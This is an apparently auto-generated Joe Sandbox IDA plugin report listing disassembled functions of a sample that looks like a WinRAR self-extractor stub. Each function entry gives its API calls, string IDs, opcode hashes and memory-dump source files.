                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: ac97ac4bd915b421f97649a3f8f1d3fc84355939f37067dd22667015646b98f1
                                                                    • Instruction ID: 7f3d99abb917cad071c340df0776c1bb296525a0f2b4ac8de86ed77b4a25a0de
                                                                    • Opcode Fuzzy Hash: ac97ac4bd915b421f97649a3f8f1d3fc84355939f37067dd22667015646b98f1
                                                                    • Instruction Fuzzy Hash: EA116979910248EFCB01EF59C992CD93F75EF04360B518066F90A8B122DBF1DA51DBA0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 322700389-393685449
                                                                    • Opcode ID: 37c1768844366bd1eae6b4676c18b58c5d8cdb8e2f957ed3482965da3217dd4a
                                                                    • Instruction ID: 0eee915df5d07e44ca93d9ea33352443cd30ec74b79702cb1fd2a09b09fb8805
                                                                    • Opcode Fuzzy Hash: 37c1768844366bd1eae6b4676c18b58c5d8cdb8e2f957ed3482965da3217dd4a
                                                                    • Instruction Fuzzy Hash: D7B17D71900A09EFCF25DFA4E881AEEB7B5FF04311B18455AE8026B21ADB31D951CFB1
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00DAB656
                                                                    • _wcslen.LIBCMT ref: 00DAB6F6
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00DAB705
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00DAB726
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                    • API String ID: 1116704506-4209811716
                                                                    • Opcode ID: 1b8d01e030915b2b6807597f1398dbd2b31636f9a3a8f7cced272309fbcd1f4c
                                                                    • Instruction ID: 14616004c9b05221fb3f1a046e6c7d3f1e23cf772bdb2b92cef3d704b49bded6
                                                                    • Opcode Fuzzy Hash: 1b8d01e030915b2b6807597f1398dbd2b31636f9a3a8f7cced272309fbcd1f4c
                                                                    • Instruction Fuzzy Hash: 9131F732108342BEE715AB34DC06FAB775CDF96730F18051EF50196193EBA4D94A87B5
                                                                    APIs
                                                                      • Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
                                                                      • Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0
                                                                    • EndDialog.USER32(?,00000001), ref: 00DAD910
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DAD937
                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00DAD950
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DAD961
                                                                    • GetDlgItem.USER32(?,00000065), ref: 00DAD96A
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00DAD97E
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00DAD994
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                    • String ID: LICENSEDLG
                                                                    • API String ID: 3214253823-2177901306
                                                                    • Opcode ID: 0236682a997c6ba72392cf460c685af4f3ea725a656b3482c19f5dde9219eb4f
                                                                    • Instruction ID: 0168d40a6c61e45fd2f9d30cdbaaa72577bb76f9bb1d44a71dc38a058261d99d
                                                                    • Opcode Fuzzy Hash: 0236682a997c6ba72392cf460c685af4f3ea725a656b3482c19f5dde9219eb4f
                                                                    • Instruction Fuzzy Hash: 4B21A132204304BBD7115F65EC49FBB3B6EEB4BB85F058019F642E66A0CB62DA05DA31
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00D9BFA3
                                                                      • Part of subcall function 00DA34D7: GetSystemTime.KERNEL32(?,00000000), ref: 00DA34EF
                                                                      • Part of subcall function 00DA34D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA34FD
                                                                      • Part of subcall function 00DA3480: __aulldiv.LIBCMT ref: 00DA3489
                                                                    • __aulldiv.LIBCMT ref: 00D9BFCF
                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 00D9BFD6
                                                                    • _swprintf.LIBCMT ref: 00D9C001
                                                                      • Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13
                                                                    • _wcslen.LIBCMT ref: 00D9C00B
                                                                    • _swprintf.LIBCMT ref: 00D9C061
                                                                    • _wcslen.LIBCMT ref: 00D9C06B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                    • String ID: %u.%03u
                                                                    • API String ID: 2956649372-1114938957
                                                                    • Opcode ID: 72aaec6042322c5d276b131d8689a0a4f56f09de3823a7fa019045d6a72c07df
                                                                    • Instruction ID: 9d9d5b9f6bed39df752901fe924977a0aea7d04b8657c36a5e7d093998b4b462
                                                                    • Opcode Fuzzy Hash: 72aaec6042322c5d276b131d8689a0a4f56f09de3823a7fa019045d6a72c07df
                                                                    • Instruction Fuzzy Hash: 03215272A14345AFCB24EF69CC45EABB7DDEB84740F44492EF449D3242DA34D90887B2
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACBEE
                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DACC05
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DACC19
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DACC2A
                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DACC42
                                                                    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00DACC66
                                                                    • _swprintf.LIBCMT ref: 00DACC85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                    • String ID: %s %s
                                                                    • API String ID: 385609497-2939940506
                                                                    • Opcode ID: 8a1d4e1ad3bccfcb12d20610d956c77e73315d9714ac130298d17dec33900c9d
                                                                    • Instruction ID: 98dd0d889828305f80b42cadbedbe947ce50c9e571f0f607829dee850cd3631a
                                                                    • Opcode Fuzzy Hash: 8a1d4e1ad3bccfcb12d20610d956c77e73315d9714ac130298d17dec33900c9d
                                                                    • Instruction Fuzzy Hash: A521F8B290024EABDB21DFA1DD44EEA77BCEB49305F104566BA1AD7112E630DA05CB70
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00D9CEA9,00D9CEAB,00000000,00000000,E7604376,00000001,00000000,00000000,?,00D9CD87,?,00000004,00D9CEA9,ROOT\CIMV2), ref: 00DB23E9
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00D9CEA9,?,00000000,00000000,?,?,00D9CD87,?,00000004,00D9CEA9), ref: 00DB2464
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00DB246F
                                                                    • _com_issue_error.COMSUPP ref: 00DB2498
                                                                    • _com_issue_error.COMSUPP ref: 00DB24A2
                                                                    • GetLastError.KERNEL32(80070057,E7604376,00000001,00000000,00000000,?,00D9CD87,?,00000004,00D9CEA9,ROOT\CIMV2), ref: 00DB24A7
                                                                    • _com_issue_error.COMSUPP ref: 00DB24BA
                                                                    • GetLastError.KERNEL32(00000000,?,00D9CD87,?,00000004,00D9CEA9,ROOT\CIMV2), ref: 00DB24D0
                                                                    • _com_issue_error.COMSUPP ref: 00DB24E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                    • String ID:
                                                                    • API String ID: 1353541977-0
                                                                    • Opcode ID: c8f2dc74b2f936385c58a8157e2b96e47749a60a0118e8b1590bb02346a23862
                                                                    • Instruction ID: cb11821cd4019a3ab26c2c4eefd31b1e9a3de596dfa5915f8d1a98eada7a9eba
                                                                    • Opcode Fuzzy Hash: c8f2dc74b2f936385c58a8157e2b96e47749a60a0118e8b1590bb02346a23862
                                                                    • Instruction Fuzzy Hash: E2419272A00305EBDB109F68DC45FFEBBA8EB58710F144229F506E7751D734D8008AB5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ClearH_prolog3Variant
                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                    • API String ID: 3629354427-3505469590
                                                                    • Opcode ID: e05ce3a07ee11e7f41ce92bf7164f847671570d73f5487188cb2f6d2a8413469
                                                                    • Instruction ID: 69d41ab92689da941e8297ab2386addf217acfadd0b5ddc229fa4f621ee846e0
                                                                    • Opcode Fuzzy Hash: e05ce3a07ee11e7f41ce92bf7164f847671570d73f5487188cb2f6d2a8413469
                                                                    • Instruction Fuzzy Hash: 0771F571A1021AAFDF14DFA4C895EAEB7B9EF48710B14116DF516E72A0CB34AD01CB74
                                                                    APIs
                                                                    • __aulldiv.LIBCMT ref: 00DA331D
                                                                      • Part of subcall function 00D9D076: GetVersionExW.KERNEL32(?), ref: 00D9D0A7
                                                                    • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00DA3340
                                                                    • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00DA3352
                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DA3363
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3373
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3383
                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00DA33BE
                                                                    • __aullrem.LIBCMT ref: 00DA3464
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                    • String ID:
                                                                    • API String ID: 1247370737-0
                                                                    • Opcode ID: 3276f69718aff883a609915ae2d3f2837bfea8ff541bbd5f129f52b18fc0a5c6
                                                                    • Instruction ID: cee2622488ddfa9fd094c938a2577ea7e93bc8a6a42d557e47b470aa7f3ead81
                                                                    • Opcode Fuzzy Hash: 3276f69718aff883a609915ae2d3f2837bfea8ff541bbd5f129f52b18fc0a5c6
                                                                    • Instruction Fuzzy Hash: C55127B1508346AFC710DF65C88096BFBE9FF88715F44892EF596C2210E774E949CB62
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                    • API String ID: 176396367-3568243669
                                                                    • Opcode ID: e5da4d75c4a86fa1f4bb224a41e85b34b9ecdafb070779cec50c1990cbe8b8fb
                                                                    • Instruction ID: ad9d87b1440a42581a928b8be7d114f03ac5e60861cba25ed04543621f9985e5
                                                                    • Opcode Fuzzy Hash: e5da4d75c4a86fa1f4bb224a41e85b34b9ecdafb070779cec50c1990cbe8b8fb
                                                                    • Instruction Fuzzy Hash: 7F51086664535796DF305A299811BB663D0DFA27B0F6C042BFDC28B1C2FBA58D838271
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00DC2452,00000000,00000000,00000000,00000000,00000000,00DB7A3D), ref: 00DC1D1F
                                                                    • __fassign.LIBCMT ref: 00DC1D9A
                                                                    • __fassign.LIBCMT ref: 00DC1DB5
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00DC1DDB
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00DC2452,00000000,?,?,?,?,?,?,?,?,?,00DC2452,00000000), ref: 00DC1DFA
                                                                    • WriteFile.KERNEL32(?,00000000,00000001,00DC2452,00000000,?,?,?,?,?,?,?,?,?,00DC2452,00000000), ref: 00DC1E33
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 1ea9e22f76681fe141c6e7b51e7837647783cb41012f3736a21184765e05ba7c
                                                                    • Instruction ID: 1a2d14128feeebd92db8bcc1e4d201a59488339a19eeba63851c1034b9ba2cde
                                                                    • Opcode Fuzzy Hash: 1ea9e22f76681fe141c6e7b51e7837647783cb41012f3736a21184765e05ba7c
                                                                    • Instruction Fuzzy Hash: BE514D75A0025AAFDB10CFA8D845EEEBBF8EF09310F14465AE956E7252D630D941CBB0
                                                                    APIs
                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D9AD2B
                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D9AD4A
                                                                      • Part of subcall function 00D9E208: _wcslen.LIBCMT ref: 00D9E210
                                                                      • Part of subcall function 00DA4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00D9E084,00000000,.exe,?,?,00000800,?,?,?,00DAAD5D), ref: 00DA417E
                                                                    • _swprintf.LIBCMT ref: 00D9ADEC
                                                                      • Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00D9AE5E
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00D9AE9E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                    • String ID: rtmp%d
                                                                    • API String ID: 2133196417-3303766350
                                                                    • Opcode ID: 2dccff1bdb01e73ea4f2c843d40c4249980823082dee957b4e5d4bd66a674353
                                                                    • Instruction ID: 0c7222061c4882c6aca2ba6d1ca68b9b30edc06d162ba22551f1e0f20143dfd2
                                                                    • Opcode Fuzzy Hash: 2dccff1bdb01e73ea4f2c843d40c4249980823082dee957b4e5d4bd66a674353
                                                                    • Instruction Fuzzy Hash: 9B516D72A00619AACF20EB648C85FEF737CEF45741F0408AAB556E3141EB349A849FB1
                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000000), ref: 00DABE8A
                                                                    • GetWindowRect.USER32(?,?), ref: 00DABED1
                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00DABF6C
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00DABF74
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00DABF8A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$RectText
                                                                    • String ID: RarHtmlClassName
                                                                    • API String ID: 3937224194-1658105358
                                                                    • Opcode ID: 68068958dbc8e531d2f21a76dd919f906b92c0892c8f643ca45c5523e069e261
                                                                    • Instruction ID: c6e866cb2f854c5deb7f1b46b6ecb7730becf1f2151fc665c27c3469839dff0c
                                                                    • Opcode Fuzzy Hash: 68068958dbc8e531d2f21a76dd919f906b92c0892c8f643ca45c5523e069e261
                                                                    • Instruction Fuzzy Hash: 1F419F72509300AFCB109F64DC49BAB7BE8EF49721F19855AF949DA252CB30D805CFB1
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00DB4F57
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00DB4F5F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00DB4FE8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00DB5013
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00DB5068
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: 26e24c78e9dbe614b653544d52046d7f066310ddf88d0b966e7cd58569054d2a
                                                                    • Instruction ID: 62d65912696c05f2d965e7897c593940b60aa321f8c46bc1fe91f54b7a2f259e
                                                                    • Opcode Fuzzy Hash: 26e24c78e9dbe614b653544d52046d7f066310ddf88d0b966e7cd58569054d2a
                                                                    • Instruction Fuzzy Hash: 5B418034E00219EBCF10DF68D885AEEBBA5EF49314F188156E8169B393DB31D905CBB0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
